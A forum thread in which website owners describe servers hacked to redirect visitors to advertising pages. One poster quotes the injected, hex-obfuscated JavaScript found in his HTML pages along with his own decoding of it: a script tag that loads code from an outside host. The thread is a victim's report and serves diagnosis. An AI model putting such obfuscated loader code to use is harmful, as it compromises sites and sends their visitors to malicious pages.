Topic: Question to those whose servers got hacked.

[BluesMan]

How did you find out that your server was hacked? What was the source code or what was being redirected etc.
I'm trying to get the bottom of why one of my sites is redirecting to advertising pages.

[BluesMan]

Javascript is getting injected into my html pages.

Code: [Select]

<script>var i,y,x="3c736372697074206c616e67756167653d276a61766173637269707427207372633d27687474703a2f2f7777772e636c617961696d2e636f6d2f696e6465782e7068703f7265663d7765626578273e3c2f7363726970743e";y='';for(i=0;i<x.length;i+=2){y+=unescape('%'+x.substr(i,2));}document.write(y);</script>

Which I managed to decode, which is.

Code: [Select]

<script language='javascript' src='http://www.clayaim.com/index.php?ref=webex'></script>


I've contacted my host about it, will let you know how I get on.

[JB]

I discovered it when my traffic started dropping for no reason.  I flicked through a handful of my sites and most of them were directing to Ad pages.
Its definately only my TP sites though.  My few sites I have left on other scripts are working fine.
I have followed Killdozers instructions over and over, but the following day, the ads are back again, so who knows?